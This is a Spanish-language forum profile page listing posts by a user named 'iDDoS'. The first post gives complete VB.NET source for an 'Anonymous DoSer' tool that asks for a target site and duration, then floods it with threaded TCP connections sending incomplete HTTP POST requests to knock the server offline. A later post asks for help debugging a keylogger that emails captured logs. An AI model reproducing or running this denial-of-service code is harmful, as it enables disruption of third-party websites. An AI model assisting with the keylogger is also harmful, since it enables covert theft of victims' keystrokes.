Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - iDDoS

#1
Código (vbnet) [Seleccionar]
Private Shared Sub Main(ByVal args As String())
   Console.ForegroundColor = ConsoleColor.Yellow
   Console.WriteLine(ChrW(10) & "             .oOo.------------.[ Anonymous DoSer ].------------.oOo." & ChrW(10))
   Console.WriteLine("             .oOo.------------.[ Anonymous DoSer ].------------.oOo." & ChrW(10))
   Console.ForegroundColor = ConsoleColor.Magenta
   Console.Write("Website [URL/IP] : ")
   Dim website As String = Console.ReadLine
   Console.Write("Time [SECONDS] : ")
   Dim s As String = Console.ReadLine
   Console.Write(ChrW(10))
   Dim count As Integer = 1
   Dim loop As Boolean = True
   New Thread(Function
       Dim start As ThreadStart = Nothing
       Dim clients As New List(Of TcpClient)()
       Do While [loop]
           If (start Is Nothing) Then
               start = Function
                   Dim item As New TcpClient()
                   clients.Add(item)
                   Try
                       item.Connect(website, 80)
                       Dim writer As New StreamWriter(item.GetStream)
                       writer.Write(("POST / HTTP/1.1" & ChrW(13) & ChrW(10) & "Host: " & website & ChrW(13) & ChrW(10) & "Content-length: 5235" & ChrW(13) & ChrW(10) & ChrW(13) & ChrW(10)))
                       writer.Flush
                       If [loop] Then
                           Console.ForegroundColor = ConsoleColor.Green
                       End If
                       Console.WriteLine(("Server Is Up / Packets sent: " & count))
                       count += 1
                   Catch exception1 As Exception
                       If [loop] Then
                           Console.ForegroundColor = ConsoleColor.Red
                       End If
                       Console.WriteLine("DoS Succeeded, Server Down!")
                   End Try
               End Function
           End If
           New Thread(start).Start
           Thread.Sleep(50)
       Loop
       Dim client As TcpClient
       For Each client In clients
           Try
               client.GetStream.Dispose
           Catch exception1 As Exception
           End Try
       Next
   End Function).Start
   Thread.Sleep(CInt((Integer.Parse(s) * &H3E8)))
   [loop] = False
   Console.WriteLine(ChrW(10) & "DoS Completed")
   Console.WriteLine("Press any key to Close...")
   Console.ReadKey
End Sub





PD: Imports System.Threading
     Imports System.Net.Sockets
     Imports System.IO


Mod: los códigos deben ir en etiquetas GeSHi
#2
la variable es Dim result As Integer
#3
buenas, pues estoy como loco buscando un keylogger en visual basic y creo que por fin he encontrado uno, incluso con su código fuente.
resulta que estaba todo perfecto pero cuando lo depuré me saltó este error y no sé de que se trata. aquí os dejo una imagen, por cierto, es un keylogger que envia logs al email.

http://www.imageshost.eu/image/Ypk

espero recibir ayuda y gracias de antemano!